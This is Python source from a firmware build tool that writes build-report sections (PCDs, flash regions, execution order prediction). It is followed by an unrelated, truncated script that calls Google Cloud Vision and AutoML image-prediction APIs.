Pcd.DatumType + ')', '(' + SkuIdName + ')', Value)) elif not self.DefaultStoreSingle and self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value)) else: FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value)) FileWrite(File, '%*s: %s: %s' % (self.MaxLen + 4, SkuInfo.VariableGuid, SkuInfo.VariableName, SkuInfo.VariableOffset)) if IsStructure: OverrideValues = Pcd.SkuOverrideValues[Sku] OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[DefaultStore]) self.PrintStructureInfo(File, OverrideFieldStruct) self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue) else: Value = SkuInfo.DefaultValue IsByteArray, ArrayList = ByteArrayForamt(Value) if FirstPrint: FirstPrint = False if IsByteArray: if self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', "{")) else: FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{")) for Array in ArrayList: FileWrite(File, '%s' % (Array)) else: if self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value)) else: FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value)) else: if IsByteArray: if self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ' , TypeName, '(' + Pcd.DatumType + ')', "{")) else: FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ' , TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{")) for Array in ArrayList: FileWrite(File, '%s' % (Array)) else: if self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ' , TypeName, '(' + Pcd.DatumType + ')', Value)) else: FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ' , TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value)) if TypeName in ('DYNVPD', 'DEXVPD'): FileWrite(File, '%*s' % (self.MaxLen + 4, SkuInfo.VpdOffset)) if IsStructure: OverrideValues = Pcd.SkuOverrideValues[Sku] if OverrideValues: Keys = OverrideValues.keys() OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]]) self.PrintStructureInfo(File, OverrideFieldStruct) self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue) def OverrideFieldValue(self, Pcd, OverrideStruct): OverrideFieldStruct = collections.OrderedDict() if OverrideStruct: for Key, Values in OverrideStruct.items(): if Values[1] and Values[1].endswith('.dsc'): OverrideFieldStruct[Key] = Values if Pcd.PcdFieldValueFromComm: for Key, Values in Pcd.PcdFieldValueFromComm.items(): OverrideFieldStruct[Key] = Values return OverrideFieldStruct def PrintStructureInfo(self, File, Struct): for Key, Value in Struct.items(): if Value[1] and 'build command options' in Value[1]: FileWrite(File, ' *B %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0])) else: FileWrite(File, ' %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0])) def StrtoHex(self, value): try: value = hex(int(value)) return value except: if value.startswith("L\"") and value.endswith("\""): valuelist = [] for ch in value[2:-1]: valuelist.append(hex(ord(ch))) valuelist.append('0x00') return valuelist elif value.startswith("\"") and value.endswith("\""): return hex(ord(value[1:-1])) elif value.startswith("{") and value.endswith("}"): valuelist = [] if ',' not in value: return value[1:-1] for ch in value[1:-1].split(','): ch = ch.strip() if ch.startswith('0x') or ch.startswith('0X'): valuelist.append(ch) continue try: valuelist.append(hex(int(ch.strip()))) except: pass return valuelist else: return value ## # Reports platform and module Prediction information # # This class reports the platform execution order prediction section and # module load fixed address prediction subsection in the build report file. # class PredictionReport(object): ## # Constructor function for class PredictionReport # # This constructor function generates PredictionReport object for the platform. # # @param self: The object pointer # @param Wa Workspace context information # def __init__(self, Wa): self._MapFileName = os.path.join(Wa.BuildDir, Wa.Name + ".map") self._MapFileParsed = False self._EotToolInvoked = False self._FvDir = Wa.FvDir self._EotDir = Wa.BuildDir self._FfsEntryPoint = {} self._GuidMap = {} self._SourceList = [] self.FixedMapDict = {} self.ItemList = [] self.MaxLen = 0 # # Collect all platform reference source files and GUID C Name # for Pa in Wa.AutoGenObjectList: for Module in Pa.LibraryAutoGenList + Pa.ModuleAutoGenList: # # BASE typed modules are EFI agnostic, so we need not scan # their source code to find PPI/Protocol produce or consume # information. # if Module.ModuleType == "BASE": continue # # Add module referenced source files # self._SourceList.append(str(Module)) IncludeList = {} for Source in Module.SourceFileList: if os.path.splitext(str(Source))[1].lower() == ".c": self._SourceList.append(" " + str(Source)) FindIncludeFiles(Source.Path, Module.IncludePathList, IncludeList) for IncludeFile in IncludeList.values(): self._SourceList.append(" " + IncludeFile) for Guid in Module.PpiList: self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.PpiList[Guid]) for Guid in Module.ProtocolList: self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.ProtocolList[Guid]) for Guid in Module.GuidList: self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.GuidList[Guid]) if Module.Guid and not Module.IsLibrary: EntryPoint = " ".join(Module.Module.ModuleEntryPointList) if int(str(Module.AutoGenVersion), 0) >= 0x00010005: RealEntryPoint = "_ModuleEntryPoint" else: RealEntryPoint = EntryPoint if EntryPoint == "_ModuleEntryPoint": CCFlags = Module.BuildOption.get("CC", {}).get("FLAGS", "") Match = gGlueLibEntryPoint.search(CCFlags) if Match: EntryPoint = Match.group(1) self._FfsEntryPoint[Module.Guid.upper()] = (EntryPoint, RealEntryPoint) # # Collect platform firmware volume list as the input of EOT. # self._FvList = [] if Wa.FdfProfile: for Fd in Wa.FdfProfile.FdDict: for FdRegion in Wa.FdfProfile.FdDict[Fd].RegionList: if FdRegion.RegionType != "FV": continue for FvName in FdRegion.RegionDataList: if FvName in self._FvList: continue self._FvList.append(FvName) for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList: for Section in Ffs.SectionList: try: for FvSection in Section.SectionList: if FvSection.FvName in self._FvList: continue self._FvList.append(FvSection.FvName) except AttributeError: pass ## # Parse platform fixed address map files # # This function parses the platform final fixed address map file to get # the database of predicted fixed address for module image base, entry point # etc. # # @param self: The object pointer # def _ParseMapFile(self): if self._MapFileParsed: return self._MapFileParsed = True if os.path.isfile(self._MapFileName): try: FileContents = open(self._MapFileName).read() for Match in gMapFileItemPattern.finditer(FileContents): AddressType = Match.group(1) BaseAddress = Match.group(2) EntryPoint = Match.group(3) Guid = Match.group(4).upper() List = self.FixedMapDict.setdefault(Guid, []) List.append((AddressType, BaseAddress, "*I")) List.append((AddressType, EntryPoint, "*E")) except: EdkLogger.warn(None, "Cannot open file to read", self._MapFileName) ## # Invokes EOT tool to get the predicted the execution order. # # This function invokes EOT tool to calculate the predicted dispatch order # # @param self: The object pointer # def _InvokeEotTool(self): if self._EotToolInvoked: return self._EotToolInvoked = True FvFileList = [] for FvName in self._FvList: FvFile = os.path.join(self._FvDir, FvName + ".Fv") if os.path.isfile(FvFile): FvFileList.append(FvFile) if len(FvFileList) == 0: return # # Write source file list and GUID file list to an intermediate file # as the input for EOT tool and dispatch List as the output file # from EOT tool. # SourceList = os.path.join(self._EotDir, "SourceFile.txt") GuidList = os.path.join(self._EotDir, "GuidList.txt") DispatchList = os.path.join(self._EotDir, "Dispatch.txt") TempFile = open(SourceList, "w+") for Item in self._SourceList: FileWrite(TempFile, Item) TempFile.close() TempFile = open(GuidList, "w+") for Key in self._GuidMap: FileWrite(TempFile, "%s %s" % (Key, self._GuidMap[Key])) TempFile.close() try: from Eot.Eot import Eot # # Invoke EOT tool and echo its runtime performance # EotStartTime = time.time() Eot(CommandLineOption=False, SourceFileList=SourceList, GuidList=GuidList, FvFileList=' '.join(FvFileList), Dispatch=DispatchList, IsInit=True) EotEndTime = time.time() EotDuration = time.strftime("%H:%M:%S", time.gmtime(int(round(EotEndTime - EotStartTime)))) EdkLogger.quiet("EOT run time: %s\n" % EotDuration) # # Parse the output of EOT tool # for Line in open(DispatchList): if len(Line.split()) < 4: continue (Guid, Phase, FfsName, FilePath) = Line.split() Symbol = self._FfsEntryPoint.get(Guid, [FfsName, ""])[0] if len(Symbol) > self.MaxLen: self.MaxLen = len(Symbol) self.ItemList.append((Phase, Symbol, FilePath)) except: EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc())) EdkLogger.warn(None, "Failed to generate execution order prediction report, for some error occurred in executing EOT.") ## # Generate platform execution order report # # This function generates the predicted module execution order. # # @param self The object pointer # @param File The file object for report # def _GenerateExecutionOrderReport(self, File): self._InvokeEotTool() if len(self.ItemList) == 0: return FileWrite(File, gSectionStart) FileWrite(File, "Execution Order Prediction") FileWrite(File, "*P PEI phase") FileWrite(File, "*D DXE phase") FileWrite(File, "*E Module INF entry point name") FileWrite(File, "*N Module notification function name") FileWrite(File, "Type %-*s %s" % (self.MaxLen, "Symbol", "Module INF Path")) FileWrite(File, gSectionSep) for Item in self.ItemList: FileWrite(File, "*%sE %-*s %s" % (Item[0], self.MaxLen, Item[1], Item[2])) FileWrite(File, gSectionStart) ## # Generate Fixed Address report. # # This function generate the predicted fixed address report for a module # specified by Guid. # # @param self The object pointer # @param File The file object for report # @param Guid The module Guid value. # @param NotifyList The list of all notify function in a module # def _GenerateFixedAddressReport(self, File, Guid, NotifyList): self._ParseMapFile() FixedAddressList = self.FixedMapDict.get(Guid) if not FixedAddressList: return FileWrite(File, gSubSectionStart) FileWrite(File, "Fixed Address Prediction") FileWrite(File, "*I Image Loading Address") FileWrite(File, "*E Entry Point Address") FileWrite(File, "*N Notification Function Address") FileWrite(File, "*F Flash Address") FileWrite(File, "*M Memory Address") FileWrite(File, "*S SMM RAM Offset") FileWrite(File, "TOM Top of Memory") FileWrite(File, "Type Address Name") FileWrite(File, gSubSectionSep) for Item in FixedAddressList: Type = Item[0] Value = Item[1] Symbol = Item[2] if Symbol == "*I": Name = "(Image Base)" elif Symbol == "*E": Name = self._FfsEntryPoint.get(Guid, ["", "_ModuleEntryPoint"])[1] elif Symbol in NotifyList: Name = Symbol Symbol = "*N" else: continue if "Flash" in Type: Symbol += "F" elif "Memory" in Type: Symbol += "M" else: Symbol += "S" if Value[0] == "-": Value = "TOM" + Value FileWrite(File, "%s %-16s %s" % (Symbol, Value, Name)) ## # Generate report for the prediction part # # This function generate the predicted fixed address report for a module or # predicted module execution order for a platform. # If the input Guid is None, then, it generates the predicted module execution order; # otherwise it generated the module fixed loading address for the module specified by # Guid. # # @param self The object pointer # @param File The file object for report # @param Guid The module Guid value. # def GenerateReport(self, File, Guid): if Guid: self._GenerateFixedAddressReport(File, Guid.upper(), []) else: self._GenerateExecutionOrderReport(File) ## # Reports FD region information # # This class reports the FD subsection in the build report file. # It collects region information of platform flash device. # If the region is a firmware volume, it lists the set of modules # and its space information; otherwise, it only lists its region name, # base address and size in its sub-section header. # If there are nesting FVs, the nested FVs will list immediate after # this FD region subsection # class FdRegionReport(object): ## # Discover all the nested FV name list. # # This is an internal worker function to discover the all the nested FV information # in the parent firmware volume. It uses deep first search algorithm recursively to # find all the FV list name and append them to the list. # # @param self The object pointer # @param FvName The name of current firmware file system # @param Wa Workspace context information # def _DiscoverNestedFvList(self, FvName, Wa): FvDictKey=FvName.upper() if FvDictKey in Wa.FdfProfile.FvDict: for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList: for Section in Ffs.SectionList: try: for FvSection in Section.SectionList: if FvSection.FvName in self.FvList: continue self._GuidsDb[Ffs.NameGuid.upper()] = FvSection.FvName self.FvList.append(FvSection.FvName) self.FvInfo[FvSection.FvName] = ("Nested FV", 0, 0) self._DiscoverNestedFvList(FvSection.FvName, Wa) except AttributeError: pass ## # Constructor function for class FdRegionReport # # This constructor function generates FdRegionReport object for a specified FdRegion. # If the FdRegion is a firmware volume, it will recursively find all its nested Firmware # volume list. This function also collects GUID map in order to dump module identification # in the final report. # # @param self: The object pointer # @param FdRegion The current FdRegion object # @param Wa Workspace context information # def __init__(self, FdRegion, Wa): self.Type = FdRegion.RegionType self.BaseAddress = FdRegion.Offset self.Size = FdRegion.Size self.FvList = [] self.FvInfo = {} self._GuidsDb = {} self._FvDir = Wa.FvDir self._WorkspaceDir = Wa.WorkspaceDir # # If the input FdRegion is not a firmware volume, # we are done. # if self.Type != "FV": return # # Find all nested FVs in the FdRegion # for FvName in FdRegion.RegionDataList: if FvName in self.FvList: continue self.FvList.append(FvName) self.FvInfo[FvName] = ("Fd Region", self.BaseAddress, self.Size) self._DiscoverNestedFvList(FvName, Wa) PlatformPcds = {} # # Collect PCDs declared in DEC files. # for Pa in Wa.AutoGenObjectList: for Package in Pa.PackageList: for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds: DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DecDefaultValue # # Collect PCDs defined in DSC file # for Pa in Wa.AutoGenObjectList: for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds: DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DefaultValue PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue # # Add PEI and DXE a priori files GUIDs defined in PI specification. # self._GuidsDb["1B45CC0A-156A-428A-AF62-49864DA0E6E6"] = "PEI Apriori" self._GuidsDb["FC510EE7-FFDC-11D4-BD41-0080C73C8881"] = "DXE Apriori" # # Add ACPI table storage file # self._GuidsDb["7E374E25-8E01-4FEE-87F2-390C23C606CD"] = "ACPI table storage" for Pa in Wa.AutoGenObjectList: for ModuleKey in Pa.Platform.Modules: M = Pa.Platform.Modules[ModuleKey].M InfPath = mws.join(Wa.WorkspaceDir, M.MetaFile.File) self._GuidsDb[M.Guid.upper()] = "%s (%s)" % (M.Module.BaseName, InfPath) # # Collect the GUID map in the FV firmware volume # for FvName in self.FvList: FvDictKey=FvName.upper() if FvDictKey in Wa.FdfProfile.FvDict: for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList: try: # # collect GUID map for binary EFI file in FDF file. # Guid = Ffs.NameGuid.upper() Match = gPcdGuidPattern.match(Ffs.NameGuid) if Match: PcdTokenspace = Match.group(1) PcdToken = Match.group(2) if (PcdToken, PcdTokenspace) in PlatformPcds: GuidValue = PlatformPcds[(PcdToken, PcdTokenspace)] Guid = GuidStructureByteArrayToGuidString(GuidValue).upper() for Section in Ffs.SectionList: try: ModuleSectFile = mws.join(Wa.WorkspaceDir, Section.SectFileName) self._GuidsDb[Guid] = ModuleSectFile except AttributeError: pass except AttributeError: pass ## # Internal worker function to generate report for the FD region # # This internal worker function to generate report for the FD region. # It the type is firmware volume, it lists offset and module identification. # # @param self The object pointer # @param File The file object for report # @param Title The title for the FD subsection # @param BaseAddress The base address for the FD region # @param Size The size of the FD region # @param FvName The FV name if the FD region is a firmware volume # def _GenerateReport(self, File, Title, Type, BaseAddress, Size=0, FvName=None): FileWrite(File, gSubSectionStart) FileWrite(File, Title) FileWrite(File, "Type: %s" % Type) FileWrite(File, "Base Address: 0x%X" % BaseAddress) if self.Type == "FV": FvTotalSize = 0 FvTakenSize = 0 FvFreeSize = 0 if FvName.upper().endswith('.FV'): FileExt = FvName + ".txt" else: FileExt = FvName + ".Fv.txt" if not os.path.isfile(FileExt): FvReportFileName = mws.join(self._WorkspaceDir, FileExt) if not os.path.isfile(FvReportFileName): FvReportFileName = os.path.join(self._FvDir, FileExt) try: # # Collect size info in the firmware volume. # FvReport = open(FvReportFileName).read() Match = gFvTotalSizePattern.search(FvReport) if Match: FvTotalSize = int(Match.group(1), 16) Match = gFvTakenSizePattern.search(FvReport) if Match: FvTakenSize = int(Match.group(1), 16) FvFreeSize = FvTotalSize - FvTakenSize # # Write size information to the report file. # FileWrite(File, "Size: 0x%X (%.0fK)" % (FvTotalSize, FvTotalSize / 1024.0)) FileWrite(File, "Fv Name: %s (%.1f%% Full)" % (FvName, FvTakenSize * 100.0 / FvTotalSize)) FileWrite(File, "Occupied Size: 0x%X (%.0fK)" % (FvTakenSize, FvTakenSize / 1024.0)) FileWrite(File, "Free Size: 0x%X (%.0fK)" % (FvFreeSize, FvFreeSize / 1024.0)) FileWrite(File, "Offset Module") FileWrite(File, gSubSectionSep) # # Write module offset and module identification to the report file. # OffsetInfo = {} for Match in gOffsetGuidPattern.finditer(FvReport): Guid = Match.group(2).upper() OffsetInfo[Match.group(1)] = self._GuidsDb.get(Guid, Guid) OffsetList = OffsetInfo.keys() OffsetList.sort() for Offset in OffsetList: FileWrite (File, "%s %s" % (Offset, OffsetInfo[Offset])) except IOError: EdkLogger.warn(None, "Fail to read report file", FvReportFileName) else: FileWrite(File, "Size: 0x%X (%.0fK)" % (Size, Size / 1024.0)) FileWrite(File, gSubSectionEnd) ## # Generate report for the FD region # # This function generates report for the FD region. # # @param self The object pointer # @param File The file object for report # def GenerateReport(self, File): if (len(self.FvList) > 0): for FvItem in self.FvList: Info = self.FvInfo[FvItem] self._GenerateReport(File, Info[0], "FV", Info[1], Info[2], FvItem) else: self._GenerateReport(File, "FD Region", self.Type, self.BaseAddress, self.Size) ## # Reports FD information # # This class reports the FD section in the build report file. # It collects flash device information for a platform. # class FdReport(object): ## # Constructor function for class FdReport # # This constructor function generates FdReport object for a specified # firmware device. # # @param self The object pointer # @param Fd The current Firmware device object # @param Wa Workspace context information # def __init__(self, Fd, Wa): self.FdName = Fd.FdUiName self.BaseAddress = Fd.BaseAddress self.Size = Fd.Size self.FdRegionList = [FdRegionReport(FdRegion, Wa) for FdRegion in Fd.RegionList] self.FvPath = os.path.join(Wa.BuildDir, "FV") self.VpdFilePath = os.path.join(self.FvPath, "%s.map" % Wa.Platform.VpdToolGuid) self.VPDBaseAddress = 0 self.VPDSize = 0 self.VPDInfoList = [] for index, FdRegion in enumerate(Fd.RegionList): if str(FdRegion.RegionType) is 'FILE' and Wa.Platform.VpdToolGuid in str(FdRegion.RegionDataList): self.VPDBaseAddress = self.FdRegionList[index].BaseAddress self.VPDSize = self.FdRegionList[index].Size break if os.path.isfile(self.VpdFilePath): fd = open(self.VpdFilePath, "r") Lines = fd.readlines() for Line in Lines: Line = Line.strip() if len(Line) == 0 or Line.startswith("#"): continue try: PcdName, SkuId, Offset, Size, Value = Line.split("#")[0].split("|") PcdName, SkuId, Offset, Size, Value = PcdName.strip(), SkuId.strip(), Offset.strip(), Size.strip(), Value.strip() if Offset.lower().startswith('0x'): Offset = '0x%08X' % (int(Offset, 16) + self.VPDBaseAddress) else: Offset = '0x%08X' % (int(Offset, 10) + self.VPDBaseAddress) self.VPDInfoList.append("%s | %s | %s | %s | %s" % (PcdName, SkuId, Offset, Size, Value)) except: EdkLogger.error("BuildReport", CODE_ERROR, "Fail to parse VPD information file %s" % self.VpdFilePath) fd.close() ## # Generate report for the firmware device. # # This function generates report for the firmware device. # # @param self The object pointer # @param File The file object for report # def GenerateReport(self, File): FileWrite(File, gSectionStart) FileWrite(File, "Firmware Device (FD)") FileWrite(File, "FD Name: %s" % self.FdName) FileWrite(File, "Base Address: %s" % self.BaseAddress) FileWrite(File, "Size: 0x%X (%.0fK)" % (self.Size, self.Size / 1024.0)) if len(self.FdRegionList) > 0: FileWrite(File, gSectionSep) for FdRegionItem in self.FdRegionList: FdRegionItem.GenerateReport(File) if len(self.VPDInfoList) > 0: FileWrite(File, gSubSectionStart) FileWrite(File, "FD VPD Region") FileWrite(File, "Base Address: 0x%X" % self.VPDBaseAddress) FileWrite(File, "Size: 0x%X (%.0fK)" % (self.VPDSize, self.VPDSize / 1024.0)) FileWrite(File, gSubSectionSep) for item in self.VPDInfoList: ValueList = item.split('|') Value = ValueList[-1].strip() IsByteArray, ArrayList = ByteArrayForamt(Value) if IsByteArray: ValueList[-1] = ' {' FileWrite(File, '|'.join(ValueList)) for Array in ArrayList: FileWrite(File, '%s' % (Array)) else: FileWrite(File, item) FileWrite(File, gSubSectionEnd) FileWrite(File, gSectionEnd) ## # Reports platform information # # This class reports the whole platform information # class PlatformReport(object): ## # Constructor function for class PlatformReport # # This constructor function generates PlatformReport object a platform build. # It generates report for platform summary, flash, global PCDs and detailed # module information for modules involved in platform build. # # @param self The object pointer # @param Wa Workspace context information # @param MaList The list of modules in the platform build # def __init__(self, Wa, MaList, ReportType): self._WorkspaceDir = Wa.WorkspaceDir self.PlatformName = Wa.Name self.PlatformDscPath = Wa.Platform self.Architectures = " ".join(Wa.ArchList) self.ToolChain = Wa.ToolChain self.Target = Wa.BuildTarget self.OutputPath = os.path.join(Wa.WorkspaceDir, Wa.OutputDir) self.BuildEnvironment = platform.platform() self.PcdReport = None if "PCD" in ReportType: self.PcdReport = PcdReport(Wa) self.FdReportList = [] if "FLASH" in ReportType and Wa.FdfProfile and MaList is None: for Fd in Wa.FdfProfile.FdDict: self.FdReportList.append(FdReport(Wa.FdfProfile.FdDict[Fd], Wa)) self.PredictionReport = None if "FIXED_ADDRESS" in ReportType or "EXECUTION_ORDER" in ReportType: self.PredictionReport = PredictionReport(Wa) self.DepexParser = None if "DEPEX" in ReportType: self.DepexParser = DepexParser(Wa) self.ModuleReportList = [] if MaList is not None: self._IsModuleBuild = True for Ma in MaList: self.ModuleReportList.append(ModuleReport(Ma, ReportType)) else: self._IsModuleBuild = False for Pa in Wa.AutoGenObjectList: ModuleAutoGenList = [] for ModuleKey in Pa.Platform.Modules: ModuleAutoGenList.append(Pa.Platform.Modules[ModuleKey].M) if GlobalData.gFdfParser is not None: if Pa.Arch in GlobalData.gFdfParser.Profile.InfDict: INFList = GlobalData.gFdfParser.Profile.InfDict[Pa.Arch] for InfName in INFList: InfClass = PathClass(NormPath(InfName), Wa.WorkspaceDir, Pa.Arch) Ma = ModuleAutoGen(Wa, InfClass, Pa.BuildTarget, Pa.ToolChain, Pa.Arch, Wa.MetaFile) if Ma is None: continue if Ma not in ModuleAutoGenList: ModuleAutoGenList.append(Ma) for MGen in ModuleAutoGenList: self.ModuleReportList.append(ModuleReport(MGen, ReportType)) ## # Generate report for the whole platform. # # This function generates report for platform information. # It comprises of platform summary, global PCD, flash and # module list sections. # # @param self The object pointer # @param File The file object for report # @param BuildDuration The total time to build the modules # @param AutoGenTime The total time of AutoGen Phase # @param MakeTime The total time of Make Phase # @param GenFdsTime The total time of GenFds Phase # @param ReportType The kind of report items in the final report file # def GenerateReport(self, File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, ReportType): FileWrite(File, "Platform Summary") FileWrite(File, "Platform Name: %s" % self.PlatformName) FileWrite(File, "Platform DSC Path: %s" % self.PlatformDscPath) FileWrite(File, "Architectures: %s" % self.Architectures) FileWrite(File, "Tool Chain: %s" % self.ToolChain) FileWrite(File, "Target: %s" % self.Target) if GlobalData.gSkuids: FileWrite(File, "SKUID: %s" % " ".join(GlobalData.gSkuids)) if GlobalData.gDefaultStores: FileWrite(File, "DefaultStore: %s" % " ".join(GlobalData.gDefaultStores)) FileWrite(File, "Output Path: %s" % self.OutputPath) FileWrite(File, "Build Environment: %s" % self.BuildEnvironment) FileWrite(File, "Build Duration: %s" % BuildDuration) if AutoGenTime: FileWrite(File, "AutoGen Duration: %s" % AutoGenTime) if MakeTime: FileWrite(File, "Make Duration: %s" % MakeTime) if GenFdsTime: FileWrite(File, "GenFds Duration: %s" % GenFdsTime) FileWrite(File, "Report Content: %s" % ", ".join(ReportType)) if GlobalData.MixedPcd: FileWrite(File, gSectionStart) FileWrite(File, "The following PCDs use different access methods:") FileWrite(File, gSectionSep) for PcdItem in GlobalData.MixedPcd: FileWrite(File, "%s.%s" % (str(PcdItem[1]), str(PcdItem[0]))) FileWrite(File, gSectionEnd) if not self._IsModuleBuild: if "PCD" in ReportType: self.PcdReport.GenerateReport(File, None) if "FLASH" in ReportType: for FdReportListItem in self.FdReportList: FdReportListItem.GenerateReport(File) for ModuleReportItem in self.ModuleReportList: ModuleReportItem.GenerateReport(File, self.PcdReport, self.PredictionReport, self.DepexParser, ReportType) if not self._IsModuleBuild: if "EXECUTION_ORDER" in ReportType: self.PredictionReport.GenerateReport(File, None) ## BuildReport class # # This base class contain the routines to collect data and then # applies certain format to the output report # class BuildReport(object): ## # Constructor function for class BuildReport # # This constructor function generates BuildReport object a platform build. # It generates report for platform summary, flash, global PCDs and detailed # module information for modules involved in platform build. # # @param self The object pointer # @param ReportFile The file name to save report file # @param ReportType The kind of report items in the final report file # def __init__(self, ReportFile, ReportType): self.ReportFile = ReportFile if ReportFile: self.ReportList = [] self.ReportType = [] if ReportType: for ReportTypeItem in ReportType: if ReportTypeItem not in self.ReportType: self.ReportType.append(ReportTypeItem) else: self.ReportType = ["PCD", "LIBRARY", "BUILD_FLAGS", "DEPEX", "HASH", "FLASH", "FIXED_ADDRESS"] ## # Adds platform report to the list # # This function adds a platform report to the final report list. # # @param self The object pointer # @param Wa Workspace context information # @param MaList The list of modules in the platform build # def AddPlatformReport(self, Wa, MaList=None): if self.ReportFile: self.ReportList.append((Wa, MaList)) ## # Generates the final report. # # This function generates platform build report. It invokes GenerateReport() # method for every platform report in the list. # # @param self The object pointer # @param BuildDuration The total time to build the modules # @param AutoGenTime The total time of AutoGen phase # @param MakeTime The total time of Make phase # @param GenFdsTime The total time of GenFds phase # def GenerateReport(self, BuildDuration, AutoGenTime, MakeTime, GenFdsTime): if self.ReportFile: try: File = StringIO('') for (Wa, MaList) in self.ReportList: PlatformReport(Wa, MaList, self.ReportType).GenerateReport(File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, self.ReportType) Content = FileLinesSplit(File.getvalue(), gLineMaxLength) SaveFileOnChange(self.ReportFile, Content, True) EdkLogger.quiet("Build report can be found at %s" % os.path.abspath(self.ReportFile)) except IOError: EdkLogger.error(None, FILE_WRITE_FAILURE, ExtraData=self.ReportFile) except: EdkLogger.error("BuildReport", CODE_ERROR, "Unknown fatal error when generating build report", ExtraData=self.ReportFile, RaiseError=False) EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc())) File.close() # This acts like the main() function for the script, unless it is 'import'ed into another script. if __name__ == '__main__': pass
predictBlock.py
# TODO(developer): Uncomment and set the following variables from multiprocessing import Process import os import CloudServiceConfig as config from google.cloud import automl_v1beta1 as automl from google.cloud import vision import Blocks os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = config.conf['service_API_Path'] project_id = config.conf['project_id'] compute_region = config.conf['compute_region'] model_id = config.conf['model_id'] thresh = config.conf["thresh"] def detect_document(path): """Detects document features in an image.""" from google.cloud import vision client = vision.ImageAnnotatorClient() with open(path, 'rb') as image_file: content = image_file.read() image = vision.types.Image(content=content) response = client.document_text_detection(image=image) for page in response.full_text_annotation.pages: for block in page.blocks: print('\nBlock confidence: {}\n'.format(block.confidence)) for paragraph in block.paragraphs: print('Paragraph confidence: {}'.format( paragraph.confidence)) for word in paragraph.words: word_text = ''.join([ symbol.text for symbol in word.symbols ]) print('Word text: {} (confidence: {})'.format( word_text, word.confidence)) for symbol in word.symbols: print('\tSymbol: {} (confidence: {})'.format( symbol.text, symbol.confidence)) def detect_crop_hints(path): """Detects crop hints in an image.""" from google.cloud import vision client = vision.ImageAnnotatorClient() with open(path, 'rb') as image_file: content = image_file.read() image = vision.types.Image(content=content) crop_hints_params = vision.types.CropHintsParams(aspect_ratios=[1.77]) image_context = vision.types.ImageContext( crop_hints_params=crop_hints_params) response = client.crop_hints(image=image, image_context=image_context) hints = response.crop_hints_annotation.crop_hints for n, hint in enumerate(hints): print('\nCrop Hint: {}'.format(n)) vertices = (['({},{})'.format(vertex.x, vertex.y) for vertex in hint.bounding_poly.vertices]) print('bounds: {}'.format(','.join(vertices))) def localize_objects(path): """Localize objects in the local image. Args: path: The path to the local file. """ client = vision.ImageAnnotatorClient() with open(path, 'rb') as image_file: content = image_file.read() image = vision.types.Image(content=content) objects = client.object_localization( image=image).localized_object_annotations print('Number of objects found: {}'.format(len(objects))) for object_ in objects: print('\n{} (confidence: {})'.format(object_.name, object_.score)) print('Normalized bounding polygon vertices: ') for vertex in object_.bounding_poly.normalized_vertices: print(' - ({}, {})'.format(vertex.x, vertex.y)) def predict(project_id, compute_region, model_id, file_path): multilabel = True # for multilabel or False for multiclass client = vision.ImageAnnotatorClient() automl_client = automl.AutoMlClient() # Get the full path of the model. model_full_id = automl_client.model_path( project_id, compute_region, model_id ) # Create client for prediction service. prediction_client = automl.PredictionServiceClient() # Read the image and assign to payload. with open(file_path, "rb") as image_file: content = image_file.read() payload = {"image": {"image_bytes": content}} image = vision.types.Image(content=content) # params is additional domain-specific parameters. # score_threshold is used to filter the result # Initialize params # params = {} # if thresh: params = {"score_threshold": thresh} response = prediction_client.predict(model_full_id, payload, params) prediction = [] for result in response.payload: # print("Predicted class name: {}".format(result.display_name)) # print("Predicted class score: {}".format(result.classification.score)) temp = [result.display_name, result.classification.score] prediction.append(temp) # print("=================") return prediction def imageOnReady(blocks): # 